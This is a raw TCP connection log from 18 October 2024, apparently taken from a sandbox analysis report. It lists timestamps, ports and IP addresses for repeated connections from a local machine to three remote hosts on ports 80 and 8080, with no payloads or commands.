                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:13.263808012 CEST808049728190.120.227.91192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:13.263870955 CEST497288080192.168.2.9190.120.227.91
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:13.298513889 CEST497288080192.168.2.9190.120.227.91
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:13.303328991 CEST808049728190.120.227.91192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:17.298574924 CEST497288080192.168.2.9190.120.227.91
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:17.532536983 CEST4972780192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:17.535013914 CEST4972980192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:17.538095951 CEST8049727185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:17.538160086 CEST4972780192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:17.539891958 CEST8049729185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:17.540054083 CEST4972980192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:17.541049004 CEST4972980192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:17.545871973 CEST8049729185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:18.602365971 CEST8049729185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:18.602384090 CEST8049729185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:18.602435112 CEST4972980192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:18.602474928 CEST4972980192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:18.602488995 CEST8049729185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:18.602500916 CEST8049729185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:18.602530003 CEST4972980192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:18.616552114 CEST497308080192.168.2.9190.120.227.91
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:18.621407986 CEST808049730190.120.227.91192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:18.621491909 CEST497308080192.168.2.9190.120.227.91
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:18.621656895 CEST497308080192.168.2.9190.120.227.91
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:18.626647949 CEST808049730190.120.227.91192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:22.644756079 CEST497308080192.168.2.9190.120.227.91
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:23.293222904 CEST4972980192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:23.293540955 CEST4973180192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:23.298506975 CEST8049731185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:23.298573971 CEST4973180192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:23.300489902 CEST8049729185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:23.300551891 CEST4972980192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:23.451464891 CEST4973180192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:23.456352949 CEST8049731185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:24.726543903 CEST8049731185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:24.726589918 CEST8049731185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:24.726600885 CEST8049731185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:24.726605892 CEST8049731185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:24.726632118 CEST4973180192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:24.726701021 CEST4973180192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:24.726713896 CEST8049731185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:24.726824045 CEST4973180192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:24.730823994 CEST8049731185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:24.730901003 CEST4973180192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:24.732449055 CEST8049731185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:24.732451916 CEST8049731185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:24.732455969 CEST8049731185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:24.732547045 CEST4973180192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:24.732547045 CEST4973180192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:24.734402895 CEST4973180192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:24.808419943 CEST497328080192.168.2.9190.120.227.91
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:24.813261032 CEST808049732190.120.227.91192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:24.813338995 CEST497328080192.168.2.9190.120.227.91
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:24.846174002 CEST497328080192.168.2.9190.120.227.91
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:24.851106882 CEST808049732190.120.227.91192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:25.219410896 CEST4973380192.168.2.9194.5.152.215
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:25.224591017 CEST8049733194.5.152.215192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:25.224684954 CEST4973380192.168.2.9194.5.152.215
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:25.224838018 CEST4973380192.168.2.9194.5.152.215
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:25.229962111 CEST8049733194.5.152.215192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:28.989554882 CEST497328080192.168.2.9190.120.227.91
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:29.381059885 CEST4973180192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:29.381337881 CEST4973580192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:29.386317968 CEST8049735185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:29.387267113 CEST8049731185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:29.387346029 CEST4973180192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:29.387352943 CEST4973580192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:29.409254074 CEST4973580192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:29.414653063 CEST8049735185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:30.465254068 CEST8049735185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:30.465279102 CEST8049735185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:30.465325117 CEST8049735185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:30.465353966 CEST4973580192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:30.465367079 CEST8049735185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:30.465399981 CEST4973580192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:30.465399981 CEST4973580192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:30.465432882 CEST4973580192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:30.482079029 CEST497368080192.168.2.9190.120.227.91
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:30.487224102 CEST808049736190.120.227.91192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:30.489954948 CEST497368080192.168.2.9190.120.227.91
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:30.492866993 CEST497368080192.168.2.9190.120.227.91
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:30.498030901 CEST808049736190.120.227.91192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:31.335000992 CEST8049733194.5.152.215192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:31.392261982 CEST4973380192.168.2.9194.5.152.215
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:31.524935007 CEST8049733194.5.152.215192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:31.525017977 CEST4973380192.168.2.9194.5.152.215
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:31.530272007 CEST4973380192.168.2.9194.5.152.215
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:31.535168886 CEST8049733194.5.152.215192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:34.518805981 CEST497368080192.168.2.9190.120.227.91
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:35.787122965 CEST4973580192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:35.787499905 CEST4973780192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:35.792428970 CEST8049737185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:35.792500019 CEST4973780192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:35.793332100 CEST8049735185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:35.793380022 CEST4973580192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:35.799225092 CEST4973780192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:35.804126978 CEST8049737185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:36.978919029 CEST8049737185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:36.978931904 CEST8049737185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:36.978941917 CEST8049737185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:36.978952885 CEST8049737185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:36.978971958 CEST8049737185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:36.979018927 CEST4973780192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:36.979063988 CEST4973780192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:36.998210907 CEST497388080192.168.2.9190.120.227.91
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:37.004023075 CEST808049738190.120.227.91192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:37.004101038 CEST497388080192.168.2.9190.120.227.91
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:37.028320074 CEST497388080192.168.2.9190.120.227.91
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:37.033940077 CEST808049738190.120.227.91192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:41.055614948 CEST497388080192.168.2.9190.120.227.91
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:41.596268892 CEST4973780192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:41.596601963 CEST4974080192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:41.601629972 CEST8049740185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:41.601696014 CEST4974080192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:41.602003098 CEST8049737185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:41.602065086 CEST4973780192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:41.642599106 CEST4974080192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:41.648546934 CEST8049740185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:42.705452919 CEST8049740185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:42.705590963 CEST4974080192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:42.705684900 CEST8049740185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:42.705697060 CEST8049740185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:42.705730915 CEST4974080192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:43.082730055 CEST497418080192.168.2.9190.120.227.91
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:43.386722088 CEST808049741190.120.227.91192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:43.386863947 CEST497418080192.168.2.9190.120.227.91
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:43.483916998 CEST497418080192.168.2.9190.120.227.91
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:43.489927053 CEST808049741190.120.227.91192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:47.487267017 CEST497418080192.168.2.9190.120.227.91
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:48.424328089 CEST4974080192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:48.424638033 CEST4975980192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:48.485589027 CEST8049740185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:48.485690117 CEST4974080192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:48.486850977 CEST8049759185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:48.486944914 CEST4975980192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:48.519427061 CEST4975980192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:48.555041075 CEST8049759185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:49.865255117 CEST8049759185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:49.865346909 CEST4975980192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:49.866540909 CEST8049759185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:49.866552114 CEST8049759185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:49.866585016 CEST4975980192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:49.866600037 CEST4975980192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:49.896806955 CEST8049759185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:49.896866083 CEST4975980192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:50.143520117 CEST497678080192.168.2.9190.120.227.91
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:50.148621082 CEST808049767190.120.227.91192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:50.148726940 CEST497678080192.168.2.9190.120.227.91
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:50.191215992 CEST497678080192.168.2.9190.120.227.91
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:50.196377039 CEST808049767190.120.227.91192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:54.346733093 CEST497678080192.168.2.9190.120.227.91
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:54.926558018 CEST4975980192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:54.926901102 CEST4978480192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:54.932348013 CEST8049759185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:54.932426929 CEST4975980192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:54.932490110 CEST8049784185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:54.932563066 CEST4978480192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:54.940896988 CEST4978480192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:54.945888042 CEST8049784185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:56.007972002 CEST8049784185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:56.008053064 CEST8049784185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:56.008063078 CEST8049784185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:56.008069038 CEST8049784185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:56.008075953 CEST4978480192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:56.008107901 CEST4978480192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:56.294420004 CEST497898080192.168.2.9190.120.227.91
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:56.301677942 CEST808049789190.120.227.91192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:56.301784992 CEST497898080192.168.2.9190.120.227.91
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:56.347258091 CEST497898080192.168.2.9190.120.227.91
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:56.356161118 CEST808049789190.120.227.91192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:00.351727962 CEST497898080192.168.2.9190.120.227.91
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:00.602912903 CEST4978480192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:00.603209972 CEST4980680192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:00.610176086 CEST8049806185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:00.610260010 CEST4980680192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:00.610724926 CEST8049784185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:00.610790968 CEST4978480192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:00.612019062 CEST4980680192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:00.617068052 CEST8049806185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:01.755256891 CEST8049806185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:01.755353928 CEST4980680192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:01.755389929 CEST8049806185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:01.755400896 CEST8049806185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:01.755438089 CEST4980680192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:01.755465984 CEST4980680192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:01.755737066 CEST8049806185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:01.755780935 CEST4980680192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:01.806994915 CEST498148080192.168.2.9190.120.227.91
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:01.811851978 CEST808049814190.120.227.91192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:01.811924934 CEST498148080192.168.2.9190.120.227.91
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:01.812066078 CEST498148080192.168.2.9190.120.227.91
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:01.817497015 CEST808049814190.120.227.91192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:05.816067934 CEST498148080192.168.2.9190.120.227.91
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:06.051587105 CEST4980680192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:06.051903963 CEST4983580192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:06.056817055 CEST8049835185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:06.056895018 CEST4983580192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:06.057049990 CEST4983580192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:06.057744980 CEST8049806185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:06.058968067 CEST4980680192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:06.062273979 CEST8049835185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:07.131195068 CEST8049835185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:07.131222963 CEST8049835185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:07.131232023 CEST8049835185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:07.131282091 CEST4983580192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:07.131315947 CEST4983580192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:07.131335020 CEST8049835185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:07.131375074 CEST4983580192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:07.393351078 CEST498428080192.168.2.9190.120.227.91
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:07.398277998 CEST808049842190.120.227.91192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:07.398353100 CEST498428080192.168.2.9190.120.227.91
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:07.398519039 CEST498428080192.168.2.9190.120.227.91
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:07.404043913 CEST808049842190.120.227.91192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:11.408873081 CEST498428080192.168.2.9190.120.227.91
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:11.908468962 CEST4983580192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:11.908751011 CEST4986180192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:11.913628101 CEST8049861185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:11.913711071 CEST4986180192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:11.913794041 CEST8049835185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:11.913840055 CEST4983580192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:11.935051918 CEST4986180192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:11.939908981 CEST8049861185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:12.691179991 CEST4986780192.168.2.9194.5.152.215
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:12.696022034 CEST8049867194.5.152.215192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:12.696127892 CEST4986780192.168.2.9194.5.152.215
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:12.696280003 CEST4986780192.168.2.9194.5.152.215
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:12.701073885 CEST8049867194.5.152.215192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:12.995506048 CEST8049861185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:12.995536089 CEST8049861185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:12.995548964 CEST8049861185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:12.995587111 CEST8049861185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:12.995615959 CEST4986180192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:12.995657921 CEST4986180192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:13.330749035 CEST498708080192.168.2.9190.120.227.91
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:13.503681898 CEST808049870190.120.227.91192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:13.503812075 CEST498708080192.168.2.9190.120.227.91
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:13.535052061 CEST498708080192.168.2.9190.120.227.91
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:13.540208101 CEST808049870190.120.227.91192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:17.555325985 CEST498708080192.168.2.9190.120.227.91
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:18.791716099 CEST4986180192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:18.792023897 CEST4988980192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:18.796395063 CEST8049867194.5.152.215192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:18.796972990 CEST8049889185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:18.796986103 CEST8049861185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:18.797058105 CEST4988980192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:18.797080040 CEST4986180192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:18.817353964 CEST4988980192.168.2.9185.53.178.50
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:18.822155952 CEST8049889185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:18.923351049 CEST8049867194.5.152.215192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:18.923434973 CEST4986780192.168.2.9194.5.152.215
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:18.929951906 CEST4986780192.168.2.9194.5.152.215
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:18.934802055 CEST8049867194.5.152.215192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:19.906209946 CEST8049889185.53.178.50192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:19.906275988 CEST8049889185.53.178.50192.168.2.9
